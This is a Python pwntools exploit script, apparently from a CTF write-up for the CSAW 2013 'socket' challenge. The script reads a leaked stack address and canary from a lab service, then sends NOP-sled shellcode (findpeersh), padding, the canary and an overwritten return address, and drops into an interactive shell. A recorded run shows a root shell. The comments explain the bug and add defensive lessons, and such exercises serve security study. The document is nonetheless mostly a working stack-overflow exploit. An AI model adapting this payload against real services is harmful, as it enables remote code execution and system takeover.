exploit.py
# CTF write-up script (CSAW 2013 "socket" challenge, per the transcript at the
# bottom). It is a flat script: the statements below run top to bottom and the
# recv/send order must match the service's own sequence of calls.
#
# Root cause being demonstrated (inferred from the decompiled calls quoted in the
# inline comments, not from the service's source): the service sends the client
# the address of its own stack buffer and the value of its stack cookie, then
# reads client input into that buffer without a bound. Disclosing the cookie
# makes the stack-canary check pass trivially, and disclosing the buffer address
# removes the guesswork that ASLR is meant to impose. Defensive takeaways:
# never write raw stack addresses or cookie values to a client, bound the copy
# to the buffer size, and a non-executable stack would stop code placed in the
# buffer from running at all.
from pwn import *  # pwntools helpers: remote, u32/p32, asm, shellcraft, log
# Target is a local listener — the lab service on this machine, not a remote host.
HOST = '0.0.0.0'
PORT = 31338
# Open the TCP connection the rest of the script talks over.
r = remote(HOST, PORT) # getaddrinfo("0.0.0.0", "31338", (const struct addrinfo *)&v12, &v11)
# The service volunteers two 4-byte little-endian values before any prompt:
# first the stack buffer's address, then the stack cookie (see the quoted send()
# calls). Order matters — these two recv()s must stay in this sequence.
buf_address = u32(r.recv(4)) # send(newsock, buffer, 4u, 0);
canary = u32(r.recv(4)) # send(newsock, &cookie, 4u, 0);
log.info("Buffer address: " + hex(buf_address))
log.info("Canary value: " + hex(canary))
# Re-encode both as 4-byte little-endian so they can be placed back into the
# reply byte-for-byte.
buf_address = p32(buf_address)
canary = p32(canary)
# 10 single-byte NOPs followed by pwntools' i386 Linux findpeersh payload; the
# transcript below shows it results in an interactive shell over the socket.
nops = asm(shellcraft.nop()) * 10
shellcode = asm(pwnlib.shellcraft.i386.linux.findpeersh())
# Pad to exactly 2048 bytes — this implies the service's buffer is 2048 bytes
# (TODO confirm against the binary; the script does not derive it).
junk1 = "A" * (2048 - len(nops) - len(shellcode))
# 0xC bytes of filler: the quoted instruction reads the cookie from [ebp-0Ch],
# so this covers the gap between the cookie slot and the saved return address
# (offsets inferred from that one instruction — confirm against the frame layout).
junk2 = "B" * 0xC # mov edx, [ebp-0Ch]
# Layout: buffer contents (NOPs + shellcode + padding), then the service's own
# cookie so its check still passes, then filler, then the leaked buffer address
# where the saved return address is expected to be.
# NOTE(review): str literals ("A" * n, "B" * n) are concatenated with the bytes
# returned by asm()/p32(); as written this relies on Python 2 str semantics,
# matching the `python exploit.py` invocation in the transcript.
payload = nops + shellcode + junk1 + canary + junk2 + buf_address
# Wait for the service's prompt before sending, then hand control to the user.
r.sendafter("here:", payload)
r.interactive()
r.close()
# Module-level string literal used as a record of a sample run; it is not a
# comment and is kept byte-for-byte.
'''
kaorz@kali:~/Exploiting/socket_csaw2013# python exploit.py
[+] Opening connection to 0.0.0.0 on port 31338: Done
[*] Buffer address: 0xffbe31dc
[*] Canary value: 0x25a6ce4
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
'''